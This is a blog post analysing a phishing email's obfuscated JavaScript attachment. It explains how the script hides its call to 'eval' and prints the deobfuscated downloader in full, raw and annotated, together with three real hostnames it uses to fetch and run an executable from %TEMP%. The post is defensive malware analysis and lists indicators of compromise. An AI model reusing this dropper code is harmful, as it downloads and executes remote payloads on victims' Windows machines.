by Matt Brennan

Fun with malicious email attachments

So, I got an email purporting to be from “FedEx International Economy”, a “Delivery Notification”. “Hmm.”, I thought. “What have I ordered? Waaait a minute…”

Attached was a zip. In the zip, a heavily obfuscated Javascript file.

Well, let’s have a look. The first few lines, pretty-printed:

// Campaign/victim identifier. It is sent verbatim as the `id=` query
// parameter by the downloader stage (see dl() below), so it doubles as a
// network indicator for this sample.
var listing = "55555D5E0913160616010A0A050A240309050D084A070B09";

// Obfuscation step: appends the next fragment of the payload source to the
// global internal_item, then chains to the next step. Every step is a
// function with a meaningless generated name; the call order — not the
// order the functions appear in the file — determines the assembled string.
function lid_copy_js_last() {
    internal_item = internal_item + 'r ws';
    zip_external_type_big();
}

// Obfuscation step: appends 'o.' to the payload source being assembled in
// internal_item and chains to editor_br() (defined elsewhere in the file).
function scan_wrapper_eu_note() {
    internal_item = internal_item + 'o.';
    editor_br();
}

// Obfuscation step: appends 'w Act' — a slice of "new ActiveXObject" — to
// internal_item and chains to string_id() (defined elsewhere in the file).
function gz_port_type_id() {
    internal_item = internal_item + 'w Act';
    string_id();
}

// Obfuscation step: appends 'ry { ' (the tail of a `try {`) to internal_item
// and chains to small_viewer_jar() (defined elsewhere in the file).
function js_eu_editor() {
    internal_item = internal_item + 'ry { ';
    small_viewer_jar();
}

Und so weiter. It’s clearly stitching some JavaScript together to be eval’d. Ooh, is that the middle of a new ActiveXObject? Obviously, this is targeted at Windows Script Host: on a default Windows install a .js file is associated with WScript, so double-clicking the attachment runs it as the logged-in user, and the script gets COM objects like WScript.Shell and MSXML2.XMLHTTP that browser JavaScript simply doesn’t have.

So where’s the eval? ⌘-f eval. Nothing. ⌘-f new Function. Nothing. ⌘-f setTimeout. Nothing. ⌘-f setInterval. Nothing. Hmm. Ok, it must be passing internal_item to a function at some point. ⌘-f (internal_item). Aha:

// Final step of the obfuscator: hands the fully assembled source to
// sum_site_au_compress. That name is declared as an empty string (below)
// and only becomes a reference to the global eval at runtime, inside
// upload_search() — which is why searching the file for "eval" finds nothing.
function au_br_es() {
    sum_site_au_compress(internal_item);
}

Getting somewhere. Just Goto definition, and… wait, what?

// Placeholder for the evaluator. Reassigned to this[xml_cn_bit] — i.e. the
// global eval once xml_cn_bit has been built up to "eval" — in upload_search().
var sum_site_au_compress = '';

Oh, ok.

// Resolves the evaluator by name. By the time this runs xml_cn_bit holds
// "eval" (built one character at a time by parser_editor_fr_gz → move_class
// → gid_admin_seed → sql_checker_json), and in non-strict top-level code
// `this` is the global object, so this[xml_cn_bit] is the global eval.
// It also appends '(fr) ' to the payload source and chains to sum_au_user()
// (defined elsewhere in the file).
function upload_search() {
    sum_site_au_compress = this[xml_cn_bit];
    internal_item = internal_item + '(fr) ';
    sum_au_user();
}

So what’s xml_cn_bit?

// Accumulates the name of the evaluator ("eval"), one character per
// obfuscation step, so the literal token never appears in the file.
var xml_cn_bit = '';

ಠ_ಠ

A few ⌘-fs later:

// Evaluator-name step 2 of 4: xml_cn_bit is 'e' on entry and 'ev' on exit.
// Called from parser_editor_fr_gz(); chains to gid_admin_seed(). Also
// appends 'nc' to the payload source in internal_item.
function move_class() {
    xml_cn_bit += 'v';
    internal_item = internal_item + 'nc';
    gid_admin_seed();
}

// Evaluator-name step 4 of 4: appends 'l', completing "eval", then calls
// upload_search(), which resolves this["eval"]. Also appends 'n dl' to the
// payload source in internal_item.
function sql_checker_json() {
    xml_cn_bit += 'l';
    internal_item = internal_item + 'n dl';
    upload_search();
}

// Evaluator-name step 1 of 4. Note the plain assignment (not +=): this
// resets xml_cn_bit to 'e' regardless of prior contents. Chains to
// move_class(). Also appends 'fu' to the payload source in internal_item.
function parser_editor_fr_gz() {
    xml_cn_bit = 'e';
    internal_item = internal_item + 'fu';
    move_class();
}

// Evaluator-name step 3 of 4: 'ev' becomes 'eva'. Called from move_class();
// chains to sql_checker_json(). Also appends 'tio' to the payload source.
function gid_admin_seed() {
    xml_cn_bit += 'a';
    internal_item = internal_item + 'tio';
    sql_checker_json();
}

this["vlea"]? What? Oh — follow the call chain rather than the file order (parser_editor_fr_gz sets 'e', then move_class → 'v', gid_admin_seed → 'a', sql_checker_json → 'l') and it spells eval. At top level `this` is the global object, so this[xml_cn_bit] is the global eval, reached without the string “eval” ever appearing in the file — which is exactly why the ⌘-f came up empty. Bingo.

Well, let’s just replace that with console.log, then, shall we? (In an isolated analysis VM, and in a plain JavaScript engine rather than WSH: the goal is to print the assembled string without ever evaluating it, and an environment with no ActiveXObject at all can’t run the payload even if the deobfuscator has a second path you missed.)

// Raw output of the deobfuscation (the string that would have been passed to eval), one line as emitted.
// Downloader stage: tries three hard-coded hosts over plain HTTP, writes any response larger than 5000 bytes
// to %TEMP%\<random digits>.exe and runs it. The pretty-printed, annotated version follows below.
function dl(fr) { var b = "www.book-keepers-now.com blog.deannamae.ca pitfaa.nidhog.com".split(" "); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+Math.round(Math.random()*100000000)+".exe"; var dn = 0; var xo = new ActiveXObject("MSXML2.XMLHTTP"); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject("ADODB.Stream"); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {} } xa.close(); } } try { xo.open("GET","http://"+b[i]+"/document.php?rnd="+fr+"&id="+listing, false); xo.send(); } catch (er) {} if (dn == 1) break; } } dl(8021); dl(832); dl(4023);

Or:

// Downloader stage: for each hard-coded host, fetch a payload over plain HTTP,
// write it as a randomly named .exe in %TEMP%, and execute it.
//   fr — caller-supplied number sent as the `rnd` query parameter (see the
//        three dl(...) calls below); its server-side meaning is not visible here.
// Globals read: listing (sent as the `id` parameter).
// Uses WSH/COM objects only (WScript.Shell, MSXML2.XMLHTTP, ADODB.Stream),
// so this runs under Windows Script Host, not in a browser.
function dl(fr) {
    // Fallback list of download hosts, tried in order. Network indicators.
    var b = "www.book-keepers-now.com blog.deannamae.ca pitfaa.nidhog.com".split(" ");
    for (var i = 0; i < b.length; i++) {
        var ws = new ActiveXObject("WScript.Shell");
        // Drop path: %TEMP%\<0..100000000>.exe. String.fromCharCode(92) is a
        // backslash, which keeps a literal "\" out of the source. The name is
        // unpredictable, but "all-digit .exe in %TEMP%" is a usable host indicator.
        var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + ".exe";
        var dn = 0; // set to 1 once a payload has been written and launched
        var xo = new ActiveXObject("MSXML2.XMLHTTP");
        xo.onreadystatechange = function() {
            if (xo.readyState == 4 && xo.status == 200) {
                var xa = new ActiveXObject("ADODB.Stream");
                xa.open();
                xa.type = 1; // binary stream (ADODB adTypeBinary)
                xa.write(xo.ResponseBody);
                // Only bodies over 5000 bytes count as a real payload — presumably
                // to skip small error pages or sinkhole responses (not verified here).
                if (xa.size > 5000) {
                    dn = 1;
                    xa.position = 0;
                    xa.saveToFile(fn, 2); // 2 = overwrite if present (ADODB adSaveCreateOverWrite)
                    try {
                        ws.Run(fn, 1, 0); // launch the dropped exe; normal window, don't wait
                    } catch (er) {} // launch failure is swallowed; dn stays 1 regardless
                }
                xa.close();
            }
        }
        try {
            // Synchronous GET (third argument false). The ready-state handler above
            // must therefore fire before send() returns for the dn check below to
            // ever see 1 — assumed MSXML behaviour, not verifiable from this listing.
            // No TLS and no integrity check on whatever is downloaded.
            xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + listing, false);
            xo.send();
        } catch (er) {} // network errors are swallowed; fall through to the next host
        if (dn == 1) break; // stop at the first host that delivered a payload
    }
}
// Three attempts with different `rnd` values. dn is local to each call, so a
// payload successfully dropped by one call does not stop the next call from
// downloading and executing again: up to three executions are possible.
dl(8021);
dl(832);
dl(4023);

Fun! var fn = ... + ".exe";, xa.saveToFile(fn, 2);, ws.Run(fn, 1, 0);. It fetches an executable over plain HTTP from one of three hosts (presumably compromised legitimate sites), drops it under a random all-digit name in %TEMP%, and runs it — and since each of the three dl() calls starts with fresh state, a successful fetch can be repeated up to three times. Yep, you’re pwned. The indicators worth keeping: the three hostnames, the /document.php?rnd=…&id=… request pattern with the hard-coded id value, and a freshly created <digits>.exe in %TEMP%. Thanks, Warren Cannon, Sr. Delivery Agent of FedEx International Economy!